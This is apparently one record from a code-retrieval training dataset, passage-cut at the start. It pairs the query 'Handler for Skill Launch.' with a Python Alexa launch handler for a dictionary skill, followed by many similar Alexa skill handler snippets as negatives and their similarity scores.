range(sort.shape[0]):\r\n thresholds[i] = sorted_scores[i]\r\n test_errors[i] = numpy.sum(self.test_errors[self.test_confidences >= thresholds[i]]) / float(numpy.sum(self.test_confidences >= thresholds[i]))\r\n\r\n return test_errors, thresholds", "def ci_mean_std_unknown(array, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n # mean of the sample\n mean = np.mean(array)\n # standard deviation\n std = np.std(array)\n # size of the sample\n n = len(array)\n # degrees of freedom\n df = n - 1\n # calculate the standard error\n std_error = std / np.sqrt(n)\n # find the t critical value\n t_star = np.round(stats.t.ppf(1 - alpha / 2, df), 3)\n # margin of error\n margin_of_error = np.round(t_star * std_error, 2)\n # calculate the lower and upper confidence bounds\n lcb = np.round(mean - margin_of_error, 2)\n ucb = np.round(mean + margin_of_error, 2)\n\n print(\"Margin Of Error: {}\".format(margin_of_error))\n print(\n \"{}% Confidence Interval for Population Mean: ({},{})\".format(\n conf_level, lcb, ucb\n )\n )", "def _interval(cls,best,lo,hi):\n return ugali.utils.stats.interval(best,lo,hi)", "def plotcenterrange():\n plist1 = np.arange(0.02,0.1,0.02)\n plist = np.arange(0.1,1,0.1)\n infectlist = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0])\n plt.plot(np.hstack((plist1,plist)),infectlist)\n plt.title(\"centerplot\")\n plt.xlabel(\"p\")\n plt.ylabel(\"total number of individuals infected\")\n plt.title(\"Total Number of Individuals Infected vs p\")\n plt.show()" ]
[ "0.67617357", "0.67138135", "0.65338296", "0.6432632", "0.6410642", "0.6392413", "0.6342866", "0.6287954", "0.6283847", "0.62821895", "0.60609925", "0.60566366", "0.60566366", "0.60537523", "0.5997194", "0.597665", "0.597048", "0.5967721", "0.59433526", "0.59037447", "0.59007347", "0.58811104", "0.58691156", "0.58635825", "0.5842739", "0.58326304", "0.5799475", "0.5782159", "0.5730345", "0.5696578", "0.5690091", "0.5688129", "0.56775355", "0.5661647", "0.5658036", "0.5647138", "0.5630971", "0.5617234", "0.5558497", "0.5535869", "0.55181223", "0.55016226", "0.55005383", "0.54982674", "0.54978454", "0.5490403", "0.5438073", "0.54233503", "0.541225", "0.5407778", "0.5396027", "0.5384465", "0.5382949", "0.53823966", "0.53814244", "0.5380758", "0.5353496", "0.5329837", "0.5329654", "0.53201914", "0.5280668", "0.5270962", "0.52556664", "0.52323323", "0.5228633", "0.5186192", "0.518201", "0.5179259", "0.51673824", "0.51613915", "0.5150967", "0.5146779", "0.5123679", "0.5119523", "0.51141137", "0.51119804", "0.51079524", "0.51079214", "0.5080909", "0.50733685", "0.5053093", "0.5040213", "0.5014708", "0.5001876", "0.49856374", "0.4976799", "0.4971827", "0.49659073", "0.49637058", "0.49539244", "0.49510017", "0.49508768", "0.49463794", "0.49433288", "0.49413553", "0.49413553", "0.4937703", "0.4935024", "0.4910271", "0.49074844" ]
0.5617236
37
Handler for Skill Launch.
def launch_request_handler(handler_input): # type: (HandlerInput) -> Response speech = "Welcome to the Merriam-Webster Dictionary. What word can I look up for you?" reprompt = "You can say: definition of word, example of word, or synonym of word." handler_input.response_builder.speak(speech).ask(reprompt) return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def on_launch(launch_request, session):\r\n\r\n #print(\"****on_launch requestId=\" + launch_request['requestId'] +\r\n # \", sessionId=\" + session['sessionId'])\r\n # Dispatch to your skill's launch\r\n return get_welcome_response()", "def on_launch(launch_request, session):\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_help_response()", "def on_launch(launch_request, session):\r\n # Dispatch to your skill's launch message\r\n return get_welcome_response()", "def on_launch(launch_request, session):\r\n\r\n print(\"on_launch requestId=\" + launch_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # Dispatch to your skill's launch\r\n return skill_information()", "def on_launch(launch_request, session):\n # Dispatch to your skill's launch message\n return get_welcome_response()", "def on_launch(launch_request, session):\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\r\n print(\"on_launch requestId=\" + launch_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # Dispatch to your skill's launch\r\n return get_welcome_response()", "def on_launch(launch_request, session):\r\n\r\n print(\"on_launch requestId=\" + launch_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # Dispatch to your skill's launch\r\n return get_welcome_response()", "def on_launch(launch_request, session):\r\n\r\n print(\"on_launch requestId=\" + launch_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # Dispatch to your skill's launch\r\n return get_welcome_response()", "def on_launch(launch_request, session):\r\n\r\n print(\"on_launch requestId=\" + launch_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # Dispatch to your skill's launch\r\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n 
print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n print(\"on_launch requestId=\" + launch_request['requestId'] + \", sessionId=\" + session['sessionId'])\n \n # Dispatch to your skill's launch\n return get_welcome_response(session)", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response(session)", "def on_launch(launch_request, session):\n\n session['attributes'] = {}\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()", "def on_launch(self):\n print(\n MyCityController.LOG_CLASS,\n '[method: on_launch]',\n '[requestId: ' + str(self._mcd.request_id) + ']',\n '[sessionId: ' + str(self._mcd.session_id) + ']'\n )\n # Dispatch to your skill's launch\n return self.get_welcome_response()", "def on_launch(launch_request, session):\n\n\tprint(\"on_launch requestId=\" + launch_request['requestId'] +\n\t\t \", sessionId=\" + session['sessionId'])\n\t# Get's the help section\n\treturn 
get_welcome_response()", "def on_launch(request):\n\n return get_launch_response()", "def handler(event, context):\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech = \"Welcome to the Alexa Skills Kit color session sample.\"\n\n handler_input.response_builder.speak(\n speech + \" \" + help_text).ask(help_text)\n return handler_input.response_builder.response", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In LaunchRequestHandler\")\n lang = handler_input.request_envelope.request.locale\n try:\n speech = welcome_speech[lang]\n except:\n speech = \"Language \" + lang + \" is not supported.\"\n\n handler_input.response_builder.speak(\n speech).ask(help_text)\n return handler_input.response_builder.response", "def on_launch(event_request, session):\n print(\"=====on_launch requestId: \" + event_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n return play_new_game(False)", "def on_launch(launch_request, session):\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])", "def on_launch(launch_request, session, state):\n\n print(\"on_launch \"+str(launch_request)+\" \"+str(session)+\" requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n # If new or corrupted user, prompt to set up first\n userId = session[\"user\"][\"userId\"]\n query_user = get_info(userId)\n if len(query_user) == 0 or \\\n (len(query_user) > 0 and len(query_user[0].keys()) != NUM_DB_COLS):\n if len(query_user) > 0 and len(query_user[0].keys()) != NUM_DB_COLS:\n delete_info(userId)\n \n return new_user_intro(session, state)\n \n # For existing users, greet by name, talk about main focus, give commands to check in\n return existing_user_intro(session, state)", "def on_launch(event, launch_request, session):\n\n logger.info(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n return get_generic_welcome_message()", "def on_launch(request):\n\n return get_launch_error_response()", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech_text = f\"Yo yo yo what's popping. 
Come checkout what is up with your Monzo\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Hello World\", speech_text)).set_should_end_session(\n False)\n return handler_input.response_builder.response", "def on_intent(intent_request, session):\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n\n if intent_name not in skillmap:\n intent_name = \"NullSkill\"\n\n if intent_name in skillmap:\n try:\n return skillmap[intent_name].execute(intent, session)\n except Exception as e:\n traceback.print_exc()\n return SkillBase().respond(\"Sorry I missed that\", \"Error\", str(e))\n else:\n raise ValueError(\"Invalid intent\")", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Welcome to the Transit Time skill, ask when the next bus is coming!\"\n\n return handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Transit Time\", speech_text)).set_should_end_session(\n False).response", "def setup_class(cls):\n cls.handler = MyScaffoldHandler(\"handler\", SkillContext())", "def launch(self):", "def test_dispatch_launch(self):\n @self.skill.launch\n def sample_func():\n \"\"\"Decorated function.\"\"\"\n self.skill.response.sessionAttributes['run'] = True\n self.skill.request.request.type = 'LaunchRequest'\n self.skill.dispatch()\n self.assertTrue(self.skill.response.sessionAttributes['run'])", "def on_intent(intent_request, session):\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n # intents_object = get_custom_intents()\n print (\"************\")\n print (intent_request)\n # fall_back = True\n # final_function = ''\n # for temp_intent in intents_object:\n # if temp_intent == intent_name:\n # fall_back = False\n # final_function = temp_intent[1]\n # break\n # if(fall_back):\n # return custom_handlers.get_fallback_msg()\n # else:\n # return final_function(intent, session)\n \n # Dispatch to your skill's intent handlers\n if intent_name == \"welcome_intent\":\n return custom_handlers.get_welcome_msg(intent, session)\n elif intent_name == \"search_intent\":\n return custom_handlers.get_search_msg(intent, session)\n elif intent_name == \"architecture\":\n return custom_handlers.get_architecture_msg(intent, session)\n elif intent_name == \"saybye\":\n return custom_handlers.get_saybye_response(intent, session)\n elif intent_name == \"myname\":\n return custom_handlers.get_myname_response(intent, session)\n elif intent_name == \"ask\":\n return custom_handlers.get_ask_response(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return custom_handlers.get_welcome_response(intent, session)\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return custom_handlers.handle_session_end_request(intent, session)\n else:\n return custom_handlers.get_fallback_msg(intent, session)", "def lambda_handler(event, context):\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if (event['session']['application']['applicationId'] !=\n \"amzn1.ask.skill.xxxx\"):\n #Set Alexa Skill ID\n raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': 
event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])", "def launch_request_handler(handler_input):\n return launch_request(handler_input)", "def launch_request_handler(handler_input):\n speech_text = \"Hello! Are you looking to connect and play with others?\"\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Hello! Are you looking to connect and play with others?\", speech_text)).set_should_end_session(False)\n return handler_input.response_builder.response", "def lambda_handler(event, context):\n logger.info(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"Check that this is being called by our skill\"\"\"\n logger.info(\"Calling app: \"+str(event['session']['application']['applicationId']))\n if (event['session']['application']['applicationId'] !=\n \"amzn1.ask.skill.\"+skill_id):\n logger.error(\"Invalid application ID\")\n raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started(event, {'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event, event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event, event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event, event['request'], event['session'])\n\n # Otherwise deal with it gracefully\n logger.info(\"Unexpected request type:\")\n logger.info(json.dumps(event))\n return build_response({}, build_speechlet_response(\"Leeds Bins\", \"Welcome to Leeds Bins. Now you can find out which waste bins to take out when. 
Try asking: what's my next collection.\", None, False))", "def on_intent(request, session):\n\n intent_name = request['intent']['name']\n \n # process the intents\n if intent_name == \"AMAZON.HelpIntent\":\n return get_help_response()\n \n elif intent_name == \"AMAZON.StopIntent\":\n return get_stop_response()\n \n elif intent_name == \"AMAZON.CancelIntent\":\n return get_stop_response()\n \n elif intent_name == \"AMAZON.FallbackIntent\":\n return get_fallback_response()\n \n elif intent_name == \"recognizeDates\":\n slots = request['intent']['slots']\n date_start_slot = slots.get('dateStart',{'value':'NA'}).get('value','NA')\n date_end_slot = slots.get('dateEnd',{'value':'NA'}).get('value','NA')\n\n return get_intent_response(date_start_slot,date_end_slot)\n \n elif intent_name == \"PollHprofs\":\n slots = request['intent'].get('slots','')\n print(slots)\n speechOutput = \"Under development\"\n return response(speech_response(speechOutput, True))\n\n elif intent_name == \"SpinVMs\":\n slots = request['intent'].get('slots','')\n print(slots)\n speechOutput = \"Under development\"\n return response(speech_response(speechOutput, True))\n\n else:\n print(\"For invalid Intents reply with help\")\n return get_help_response()", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"<YOUR INTENT NAME HERE>\":\n # Update the wordsmith_data variable with your data. Use key, value\n # pairs where the key is the column name in Wordsmith and the value is\n # the value contained in that column\n wordsmith_data = { 'column1': 'value1', 'column2': 'value2' }\n narrative = wordsmith.generate(WORDSMITH_API_KEY, WORDSMITH_PROJECT_SLUG, WORDSMITH_TEMPLATE_SLUG, wordsmith_data)\n if 'errors' not in narrative:\n return build_response(session.get('attributes', {}), build_speechlet_response('Wordsmith Generated Response', narrative['data']['content'],\n '<REPROMPT TEXT HERE>', True))\n else:\n if not isinstance(narrative['errors'], list) :\n return build_response(session.get('attributes', {}), build_speechlet_response('Wordsmith Generation Error', 'Wordsmith reported the following error: {}'.format(narrative['errors']['detail']),\n '<REPROMPT TEXT HERE>', True))\n else:\n details = ', '.join([e['details'] for e in narrative['errors']])\n return build_response(session.get('attributes', {}), build_speechlet_response('Wordsmith Generation Error', 'Wordsmith reported the following error: {}'.format(details),\n '<REPROMPT TEXT HERE>', True))\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def on_start(self, ctx):\n pass", "def lambda_handler(event, context):\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n #if (event['session']['application']['applicationId'] != \"<APPLICATION_ID>\"):\n # raise ValueError(\"Invalid Application ID\")\n\n\n if event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], 
event['session'])", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"NextLaunchIntent\":\n return perform_next_launch_intent(intent, session)\n elif intent_name == \"MissionDetailIntent\":\n return get_color_from_session(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n print(\"---INTENT: \" + intent_name)\n\n # Dispatch to your skill's intent handlers\n try:\n if intent_name == \"GetSynonymIntent\":\n return get_synonym(intent, session)\n elif intent_name == \"GetRandomSynonymIntent\":\n return get_random_synonym(intent, session)\n elif intent_name == \"GetAllSynonymsIntent\":\n return get_all_synonyms(intent, session)\n elif intent_name == \"GetAntonymIntent\":\n return get_antonym(intent, session)\n elif intent_name == \"GetRandomAntonymIntent\":\n return get_random_antonym(intent, session)\n elif intent_name == \"GetAllAntonymsIntent\":\n return get_all_antonyms(intent, session)\n elif intent_name == \"GetPOSIntent\":\n return get_pos(intent, session)\n elif intent_name == \"GetRhymeIntent\":\n return get_rhyme(intent, session)\n elif intent_name == \"GetRandomRhymeIntent\":\n return get_random_rhyme(intent, session)\n elif intent_name == \"GetDefinitionIntent\":\n return get_definition(intent, session)\n elif intent_name == \"GetRandomDefinitionIntent\":\n return get_random_definition(intent, session)\n elif intent_name == \"GetAllDefinitionsIntent\":\n return get_all_definitions(intent, session)\n elif intent_name == \"GetSyllablesIntent\":\n return get_syllables(intent, session)\n elif intent_name == \"GetFrequencyIntent\":\n return get_frequency(intent, session)\n elif intent_name == \"GetPronunciationIntent\":\n return get_pronunciation(intent, session)\n elif intent_name == \"GetAllCommandsIntent\":\n return get_all_commands()\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n response = build_speechlet_response(\"Error\", \"Sorry, I don't know that command. 
I can find definitions, synonyms, antonyms, and more if you say something like 'a synonym for happy'.\", None, True)\n return build_response({}, response)\n\n except:\n response = build_speechlet_response(\"Error\", \"Sorry, I don't know that word!\", None, True)\n return build_response({}, response)", "def launch_intent():\n welcome_message = \"On which cloud would you like to launch Galaxy?\"\n return question(welcome_message).reprompt(help_text)", "def lambda_handler(event, context):\n\n \"\"\"\n This statement prevents someone else from configuring a skill that sends \n requests to this function.\n \"\"\"\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])", "def __init__(self):\n super(LaunchRequest, self).__init__()", "def handle(self, handler_input):\n speech = \"I'm a sample Alexa Skill. Let me give you a random Chuck Norris Fact. \"\n speech += getChuckFact()\n speech += \". Do you want more awesome Chuck facts?\"\n \n \"\"\"\n Take note of the set_should_end_session. If set to 'True', the alexa\n skill will gracefully end execution.AbstractExceptionHandler\n \n The set_card method specifies what kind of cards do you want to use when\n interacting with the user via display. A 'SimpleCard' display's text.\n \n For more info about cards, see:\n https://developer.amazon.com/docs/custom-skills/include-a-card-in-your-skills-response.html\n \"\"\"\n handler_input.response_builder.speak(speech).set_card(\n SimpleCard(speech)).set_should_end_session(False)\n return handler_input.response_builder.response", "def lambda_handler(event, context):\n print(\"Incoming request...\")\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if (event['session']['application']['applicationId'] !=\n \"amzn1.ask.skill.2994421a-75ef-4502-9d4a-bf83f20a7ade\"):\n raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent_name = \"\"\n if 'intent' in intent_request:\n intent = intent_request['intent']\n if 'name' in intent:\n intent_name = intent['name']\n\n # Dispatch to your skill's intent handlers\n if not intent_name:\n return get_help_response()\n elif intent_name == \"Hello\":\n return say_hello()\n elif intent_name == \"Brandon\":\n return say_brandon()\n elif intent_name == \"Warning\":\n return say_warning()\n elif intent_name == \"Dance\":\n return say_dance_lights()\n elif intent_name == \"Spot\":\n return say_spot_light()\n elif intent_name == \"AMAZON.HelpIntent\":\n 
return get_help_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n return say_hello()\n return get_help_response()", "def _starting_up():\n global ws, skill_reload_thread, event_scheduler\n\n ws.on('intent_failure', FallbackSkill.make_intent_failure_handler(ws))\n\n # Create skill_manager listener and invoke the first time\n ws.on('skill_manager', skills_manager)\n ws.on('mycroft.internet.connected', install_default_skills)\n ws.emit(Message('skill_manager', {}))\n\n # Create the Intent manager, which converts utterances to intents\n # This is the heart of the voice invoked skill system\n\n PadatiousService(ws)\n IntentService(ws)\n event_scheduler = EventScheduler(ws)\n # Create a thread that monitors the loaded skills, looking for updates\n skill_reload_thread = WatchSkills()\n skill_reload_thread.daemon = True\n skill_reload_thread.start()\n\n # Wait until skills have been loaded once before starting to check\n # network connection\n skill_reload_thread.wait_loaded_priority()\n check_connection()", "def on_intent(intent_request, session):\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"GetLottozahlen\":\n return get_Lottozahlen(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_help_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def on_intent(event):\n\n intent = event[\"request\"][\"intent\"][\"name\"]\n\n if intent in (\"AMAZON.CancelIntent\", \"AMAZON.StopIntent\", \"AMAZON.NoIntent\"):\n return handle_session_end_request()\n\n if intent == \"AMAZON.YesIntent\":\n if \"attributes\" in event[\"session\"] and \"previousIntent\" in \\\n event[\"session\"][\"attributes\"]:\n\n if event[\"session\"][\"attributes\"][\"previousIntent\"] == \"AMAZON.HelpIntent\":\n return main_handler(event)\n\n speech_output = event[\"session\"][\"attributes\"][\"nextStations\"]\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)\n\n speech_output = \"Sorry, something went wrong.\"\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)\n\n if intent == \"isBikesAvailable\":\n return main_handler(event)\n\n if intent == \"AMAZON.HelpIntent\":\n return handle_help_intent()\n\n speech_output = \"Sorry, I don\\'t know that.\"\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)", "def on_intent(request, session):\n\n intent = request['intent']\n\n print(\"on_intent:\", intent)\n\n if intent[\"name\"] == \"AntwortIntent\":\n return handle_answer_request(intent, session)\n elif intent[\"name\"] == \"DontKnowIntent\":\n return handle_answer_request(intent, session)\n elif intent['name'] == \"AMAZON.RepeatIntent\":\n return handle_repeat_request(intent, session)\n elif intent['name'] == \"AMAZON.StopIntent\" or intent['name'] == \"AMAZON.CancelIntent\":\n return handle_finish_session_request(intent, session)\n elif intent['name'] == \"AMAZON.HelpIntent\":\n return get_help(intent, session)\n elif intent['name'] == \"StartQuizIntent\" or intent['name'] == \"AMAZON.StartoverIntent\":\n if session[\"new\"] == 
False:\n return get_welcome_message(restart=True)\n #if no intent is identified:\n return get_help(intent, session)", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n elif intent_name == \"Ja_Bitte\":\n return Ja_Bitte_session(intent, session)\n else:\n raise ValueError(\"Invalid intent\")", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"WhensNextTrainIntent\":\n return get_next_train(intent, session)\n elif intent_name == \"SetFavoriteStationIntent\":\n return set_favorite_station(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_help_response(session)\n elif intent_name == \"AMAZON.StopIntent\" or intent_name == \"AMAZON.CancelIntent\":\n return get_stop_response(session)\n else:\n raise ValueError(\"Invalid intent\")", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n attr = handler_input.attributes_manager.persistent_attributes\n speech_text = ''\n\n if not attr:\n # create a new one\n attr['character'] = Character().to_dict()\n handler_input.attributes_manager.persistent_attributes = attr\n\n speech_text += (\n \"Welcome to Daily Dungeon. \"\n \"Seems you don't have a character here, so I just created one for you. \")\n\n card_text='Character created successfully.'\n\n else:\n # load the char and claim trophy\n\n attr = handler_input.attributes_manager.persistent_attributes\n cur_char = Character(attr['character'])\n passing_time, loot_exp = cur_char.claim_loot()\n speech_text = 'Welcome to Daily Dungeon. '\n day = passing_time // (24 * 3600)\n hour = (passing_time % (24 * 3600)) // 3600\n minute = (passing_time % 3600) // 60\n if day > 1:\n speech_time = '{} days and {} hours'.format(day, hour)\n elif day == 1:\n speech_time = 'one day and {} hours'.format(hour)\n elif hour > 1:\n speech_time = '{} hours and {} 